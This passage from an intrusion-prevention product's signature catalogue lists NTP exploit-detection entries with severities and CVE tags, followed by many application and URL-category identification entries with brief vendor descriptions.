Vulnerability: Ntp-Daemon-Autokey-Stack-Buffer-Overflow
Description:
Back to top

NTP_UDP-Ntp-Daemon-Readvar-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the Network Time Protocol daemon detected
Context: UDP NTP Stream
Severity: 10
Tags: Any Operating System, Any Hardware, ntpd, CVE2001, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-358-4219
Vulnerability: Ntp-Daemon-Readvar-Stack-Buffer-Overflow
Description:
Back to top

NTP_UDP-Ntp-Mode-7-Denial-Of-Service-Exploit

About this situation: An exploit against a denial of service vulnerability in the Network Time Protocol (NTP) daemon detected
Context: UDP NTP Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ntpd, CVE2009, Any Operating System not specific, Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-356-4219
Vulnerability: Ntp-Mode-7-Denial-Of-Service
Description:
Back to top

NTP_UDP-Ntp-Mode-7-Message

About this situation: NTP mode 7 (MODE_PRIVATE) message detected
Context: UDP NTP Stream
Severity: 1
Tags: Any Operating System, Any Hardware, ntpd, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-356-4219
Description:
Back to top

NTP_UDP-Ntp-Monlist-Command

About this situation: A deprecated NTP REQ_MON_GETLIST or REQ_MON_GETLIST_1 control instruction detected
Context: UDP NTP Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ntpd, CVE2013, Any Operating System not specific, Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Ntp-Monlist-Denial-Of-Service
Description:
Back to top

NTP_UDP-NTP-Response-With-Same-Source-And-Destination-Ports

About this situation: An unusual NTP response detected
Context: UDP NTP Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, CVE2024, Any Operating System not specific, Any Software not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1708-5242
Last changed: sgpkg-ips-1708-5242
Vulnerability: Loop-Denial-Of-Service-CVE-2024-2169
Description:
Back to top

NTP_UDP-Ntp.org-Network-Time-Protocol-Windows-Daemon-Getendptfromioctx-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ntp.org NTP detected
Context: UDP NTP Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ntpd, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-835-5242
Last changed: sgpkg-ips-835-5242
Vulnerability: Ntp.org-Network-Time-Protocol-Windows-Daemon-Getendptfromioctx-Denial-Of-Service
Description:
Back to top

NTP_UDP-NTPsec-ntpd-Process-Control-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in NTPsec ntpd detected
Context: UDP NTP Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ntpd, CVE2019, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1141-5242
Vulnerability: NTPsec-ntpd-Process-Control-Out-Of-Bounds-Read
Description:
Back to top

NTP_UDP-NTPsec-ntpd-Write-Variables-DoS

About this situation: An attempt to exploit a vulnerability in NTPsec ntpd detected
Context: UDP NTP Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ntpd, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1334-5242
Vulnerability: NTPsec-ntpd-Write-Variables-DoS
Description:
Back to top

Ntrglobal-Cloud

About this situation: NTRglobal Cloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: Allowes users to backup Files to the Cloud.
Back to top

NTT-i3

About this situation: Application NTT-i3 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NTT i3 provides research, applied RandD expertise, and agile product development.
Back to top

NTTDATA

About this situation: Application NTTDATA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NTTDATA is the company that provides consulting, managed services, projects, outsourcing, and cloud-based solutions to mid-sized and large enterprises in industries.
Back to top

Nuance

About this situation: Application Nuance detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nuance is a computer software technology company that provides speech and imaging applications.
Back to top

Nudity

About this situation: Sites that offer depictions of nude or seminude human forms, singly or in groups, not overtly sexual in intent or effect.
Context: URL Application Context
Severity: 1
Tags: Adult Material, Legal Liability, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that offer depictions of nude or seminude human forms, singly or in groups, not overtly sexual in intent or effect.
Back to top

Numerix

About this situation: Application Numerix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Numerix is the market's provider of risk analytics technology for the pricing, structuring, modeling and valuation derivative instrument, or portfolio. It risk solutions enable financial institutions to understand performance, analyze and anticipate future derivatives risks.
Back to top

NuOrder

About this situation: Application NuOrder detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NuOrder is an eCommerce and order entry platform that helps brands and retailers simplify order management and buyer outreach.
Back to top

Nutcache

About this situation: Application Nutcache detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nutcache is online invoicing and time tracking software.
Back to top

Nutrition

About this situation: Sites that provide information about nutrition.
Context: URL Application Context
Severity: 1
Tags: Drugs, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about nutrition.
Back to top

Nutshell-CRM

About this situation: Nutshell CRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Nutshell CRM manages users business leads, contacts, accounts, and salesforce.
Back to top

Nutstore

About this situation: Application Nutstore detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Nutstore is a cloud storage service that helps you access your files anywhere at any time and share them.
Back to top

Nuxeo

About this situation: Application Nuxeo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nuxeo is the force behind the Nuxeo Platform, a content management platform enabling the software defined enterprise to build powerful applications.
Back to top

Nvidia

About this situation: Nvidia traffic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1145-5242
Last changed: sgpkg-ips-1145-5242
Description: Nvidia is a designer of graphics processing units.
Back to top

NVIDIA Geforce Experience

About this situation: Endpoint Context Agent based NVIDIA Geforce Experience detection
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-986-5242
Description: NVIDIA Geforce Experience endpoint application has been detected. NVIDIA Geforce Experience is a dashboard application which enables certain tasks related to NVIDIA graphics cards. Such tasks include automatic updates and online game streaming.
Back to top

NY-Times

About this situation: The New York Times usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-630-5211
Description: The New York Times is the online version of an American daily newspaper.
Back to top

Nyt.fi

About this situation: Nyt.fi usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Description: Nyt.fi is a magazine that is published weekly as a part of Helsingin Sanomat, a Finnish daily newspaper.
Back to top

Nytimes

About this situation: Nytimes usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Nytimes mobile app for New york times(http://www.nytimes.com), which is for national and World news.
Back to top

O2-UK

About this situation: Application O2-UK detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: O2 is the commercial brand of Telefonica UK Limited digital communications company. With over 23 million customers, O2 runs 2G, 3G and 4G networks across the UK, as well as operating O2 Wifi and owning half of Tesco Mobile.
Back to top

O3spaces

About this situation: Application O3spaces detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: O3Spaces cloud based workplace document management and collaboration splution.
Back to top

Oakton

About this situation: Application Oakton detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Oakton is a consulting and technology company that provides experience, business insight and technology solutions to help clients make decisions.
Back to top

OATH database backup successfully performed

About this situation: OATH database backup successfully performed
Context: Authentication Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

Obindo

About this situation: Application Obindo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Obindo helps you capture, organize, and surface information with apps you already use.
Back to top

Obopay

About this situation: Application Obopay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Obopay is a mobile payment solution company which offers mobile payment products to companies in Telecom, Finance and Retail industries.
Back to top

Obsolete Chrome

About this situation: Endpoint Context Agent based obsolete Chrome browser
Context: EI Correlation
Severity: 1
Tags: Obsolete Web Browsers, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: An out of date version of Chrome browser has been detected.
Back to top

Obsolete Firefox

About this situation: Endpoint Context Agent based obsolete Firefox browser detection
Context: EI Correlation
Severity: 1
Tags: Obsolete Web Browsers, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1570-5242
Description: An out of date version of Firefox browser has been detected.
Back to top

Obsolete Opera

About this situation: Endpoint Context Agent based obsolete Opera browser detection
Context: EI Correlation
Severity: 1
Tags: Obsolete Web Browsers, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: An out of date version of Opera browser has been detected.
Back to top

Ocn-Mail

About this situation: OCN Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: OCN Mail: The services/features of this site include web mail.
Back to top

OCSL

About this situation: Application OCSL detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OCSL helps organisations to achieve business outcomes through the provision of technology solutions built on products and services. It is a partner for hewlett packard and microsoft gold cloud computing and data centre software solutions.
Back to top

OctaShop

About this situation: Application OctaShop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Octashop is a SOA based eRetail solution framework providing rapid, customized online retail systems.
Back to top

Octopus-HR

About this situation: Application Octopus-HR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Octopus HR - online HR System
Back to top

Octopus-itsm

About this situation: Application Octopus-itsm detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Octopus-ITSM.com inc. develops, markets and operates a request and asset management software offered in the Cloud.
Back to top

Octopz

About this situation: Octopz usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: An on-demand collaboration application
Back to top

oDesk

About this situation: oDesk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description: This platform allows businesses and independent professionals connect and collaborate remotely; it allows clients to interview, hire and work with freelancers and agencies through the platform. Source: Wikipedia
Back to top

Odijoo

About this situation: Application Odijoo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Odijoo is web-based eLearning platform that allows users create online courses, share online courses and monetize online courses from their own online space.
Back to top

Odn-Mail

About this situation: ODN Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: This site is a Japanese internet service provider. ODN provides internet connections and web mail services.
Back to top

Odnoklassniki

About this situation: Odnoklassniki usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Odyssee-Mobile

About this situation: Application Odyssee-Mobile detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Odyssee Service Software is a complete Field Service Management Software covering Installed base management, dispatch and scheduling, digital work orders, track and tracing, time-sheets registration, reports, mapping, route optimization, car travel and spare parts management.
Back to top

Oempro

About this situation: Application Oempro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Oempro - professional re-brandable and white-label email marketing, auto-responder and mail list management software written in PHP and MySQL. Runs on your own server.
Back to top

Oesia

About this situation: Application Oesia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Oesia is a consulting firm specializing in technology, present in Spain and Latin America that has developed projects for clients in different countries in Europe, America and Asia. It is organized into two divisions
Back to top

Office - Apps

About this situation: Office function that enables a user to collaborate via various applications.
Context: URL Application Context
Severity: 1
Tags: Collaboration - Office, Business Usage
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Office function that enables a user to collaborate via various applications.
Back to top

Office - Documents

About this situation: Office function that enables a user to collaborate via document applications.
Context: URL Application Context
Severity: 1
Tags: Collaboration - Office, Business Usage
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Office function that enables a user to collaborate via document applications.
Back to top

Office - Drive

About this situation: Office function that enables a user to collaborate via virtual storage.
Context: URL Application Context
Severity: 1
Tags: Collaboration - Office, Business Usage
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Office function that enables a user to collaborate via virtual storage.
Back to top

Office - Mail

About this situation: Office function that enables a user to collaborate via email and messaging.
Context: URL Application Context
Severity: 1
Tags: Collaboration - Office, Business Usage
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Office function that enables a user to collaborate via email and messaging.
Back to top

OfficeBooks

About this situation: Application OfficeBooks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OfficeBooks offers an easy to use, business management application for small and medium sized business. The OfficeBooks solution is a software-as-a-service (SaaS) offering which minimizes upfront and infrastructure costs without sacrificing functionality and performance.
Back to top

Officeclip

About this situation: OfficeClip usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: OfficeClip creates software products to manage contacts, customers and employees, Track Contacts and Opportunties on the Web. Manage Employees, Project Time and Expenses and Track Software Bugs and Project Issues.
Back to top

Officehard

About this situation: OfficeHARD usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This service allows users to oad files and track information
Back to top

OfficeTimer

About this situation: Application OfficeTimer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OfficeTimer is timesheet software used to effectively manage and streamline their Office activities like timesheet, employee time-offs, employee payroll, project management, project expense tracking, expense reimbursement and client billing.
Back to top

Officetimesheets

About this situation: Application Officetimesheets detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lookout Software is a developer of timesheet software, shared calendars, group calendars and Microsoft Outlook mobile synchronization applicaitons.
Back to top

OfficeTools

About this situation: Application OfficeTools detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OfficeTools provides time billing software for Practice Management. WorkSpace, Workflow, Tax Automation, Online Portals, Conferences, and Resources.
Back to top

Officeworks

About this situation: Application Officeworks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Officeworks is retailer and supplier of office products and solutions for home, business and education.
Back to top

Offiria

About this situation: Application Offiria detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Offiria is a full featured, Open Source Enterprise Social Network and intranet software for your team or business.
Back to top

OffiServ

About this situation: Application OffiServ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OffiServ helps organizations to support employees in daily issues like: get help for a computer, plan and approve absences or book shared resources.
Back to top

Offsite-Data-Depot

About this situation: Application Offsite-Data-Depot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Offsite Data Depot is northern Nevada's only full-service provider of offsite commercial records storage and information management solutions.
Back to top

Ofipro

About this situation: Application Ofipro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ofipro is a Online Business Solution for Freelancers, Small and Medium Business and Accountants.
Back to top

Ogame

About this situation: OGame usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Ogogo-Apps

About this situation: Application Ogogo-Apps detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ogogo Apps combines simple online CRM, easy contact management and file and document management capabilities into one single, simple application.
Back to top

Oikotie

About this situation: Oikotie usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-1764-5242
Description: Oikotie usage detected. Oikotie is a Finnish online search service for jobs, apartments and second hand cars.
Back to top

Okcupid

About this situation: OkCupid usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Okta

About this situation: Okta usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1025-5242
Description: Okta is a service which provides enterprise-grade identity and mobility management.
Back to top

Oktopost

About this situation: Application Oktopost detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Oktopost is a social media management platform designed to publish social messages, engage with social sales and support employee soical advocacy
Back to top

Olapic

About this situation: Application Olapic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Olapic increases sales and engagement for over 200 brands and retailers by integrating customer photos into the shopping experience.
Back to top

Olark

About this situation: Olark usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: A live chat software that lifts customer support and sales.
Back to top

OLE File

About this situation: OLE file detected
Context: File Stream Redirection
Severity: 2
Tags: File Type Identification, Content Identification, Document, Generic OLE Document
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-409-4219
Description:
Back to top

Oloadcdn

About this situation: Oloadcdn usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Description: Oloadcdn is a content delivery network used by openload.co.
Back to top

OLX

About this situation: Application OLX detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OLX empower millions of people across the globe by helping them connect and share their goods and services.
Back to top

Olympus A-GPS Utility

About this situation: Endpoint Context Agent based Olympus A-GPS Utility detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-991-5242
Last changed: sgpkg-ips-991-5242
Description: Olympus A-GPS Utility endpoint application has been detected. This application is used to update assisted GPS (A-GPS) data on GPS enabled Olympus cameras, such as TG-3.
Back to top

Omegle

About this situation: Omegle usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Omegle is a great way of meeting new friends. When you use Omegle, we pick another user at random and let you have a one-on-one chat with each other. Chats are completely anonymous, and you can disconnect whenever you like, although there is also nothing to stop you from revealing personal details if you choose to.
Back to top

Omeka

About this situation: Application Omeka detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Omeka.net is web-publishing platform that allows anyone with an account to create or collaborate on a website to display collections and build digital exhibitions.
Back to top

Omni-channel-commerce-solution

About this situation: Application Omni-channel-commerce-solution detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Omni-channel is a provider of eCommerce solutions, that offer Omni-Channel Offering, Product Content Management, Order Management, and hybris Marketing Conversion.
Back to top

Omnicell

About this situation: Application Omnicell detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Omnicell provides automated healthcare solutions to help improve operational efficiency, patient safety.
Back to top

OmniContext

About this situation: Application OmniContext detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OmniContext Personal Analytics - optimize your work productivity,Monitor your lifestyle, Share your metrics with friends, colleagues, and peers.
Back to top

Omnilink

About this situation: Application Omnilink detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Omnilink helps gov't agencies, businesses, and consumer track and monitor people and things. Its M2M platform connects hardware, networks, software, and services to bring solutions.
Back to top

OmniPrime

About this situation: Application OmniPrime detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OmniPrime is a provider of cloud based solution for managing orders, data analytic and Intelligence for manufacturers, retailers, e-commerce B2C, vendors, suppliers and distributors.
Back to top

OmniSoft

About this situation: Application OmniSoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Omnisoft is a mobile solution that allows you to sell a store's products in a physical retail setting and online.
Back to top

OmniStrat

About this situation: Application OmniStrat detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OmniStrat is online tool that improves and simplifies the way you manage your business by use intuitive planning and execution app with rich social collaboration features.
Back to top

OMS-Platform

About this situation: Application OMS-Platform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OMS Platform provides solutions for product storage, online transactions, shipping, customer support, order resolution, and more.
Back to top

On24

About this situation: ON24 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: ON24 provides platform for demand generation, partner enablement, training, product launches, company town hall meetings and user conferences.
Back to top

Onbase

About this situation: Application Onbase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OnBase by Hyland enterprise content management (ECM) is a software solution that solves problems of paper-based tasks. It is a suite of document, process and case management solutions that help organizations streamline processes.
Back to top

One-Media-Hub

About this situation: Application One-Media-Hub detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OneMediaHub is a personal cloud service that keeps your digital life in sync between your Android smartphone or tablet and your other mobile devices and computers. Your pictures, videos, music, documents, contacts, and calendar are automatically secured in your OneMediaHub account and available on all your mobile devices, computers, and the OneMediaHub.com website. View and share your digital life with friends and family regardless of which device you're carrying and which device you used to upload your pictures, videos, music or documents.
Back to top

One-More-Story

About this situation: Application One-More-Story detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: One More Story is an online children's library.
Back to top

One-Network-Enterprises

About this situation: Application One-Network-Enterprises detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: One Network is the home of the Real Time Value Network, the world's first and only real time decision-making supply chain suite in the cloud. ONE's Real Time Value Network enables customers to collaborate with all their value partners and providers on a single network and in real time.
Back to top

One-to-One-Text

About this situation: Application One-to-One-Text detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: One-to-One-Text is a Multi-Operator Live Chat Support tool. The tool enables you to instantly communicate with potential customers visiting your website.
Back to top

One.com

About this situation: One.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Hosting, Application Routing
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-1764-5242
Description: One.com is a Danish hosting operator, providing web site and mail hosting.
Back to top

OneBigDrive

About this situation: Application OneBigDrive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OneBigDrive - secure cloud storage service that lets you manage all your cloud accounts from a single folder.
Back to top

OneBox

About this situation: Application OneBox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: A virtual phone system delivers pbx features without hardware. The Onebox system provides you with voicemail transcription, online faxing and more.
Back to top

OneCommand's-HigherGear-CRM

About this situation: Application OneCommand's-HigherGear-CRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OneCommand's HigherGear, content management suite provides superior control and accountability over the entire sales, prospecting, trade-cycle and owner follow-up process while increasing dealership profitability.
Back to top

OneDesk

About this situation: Application OneDesk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
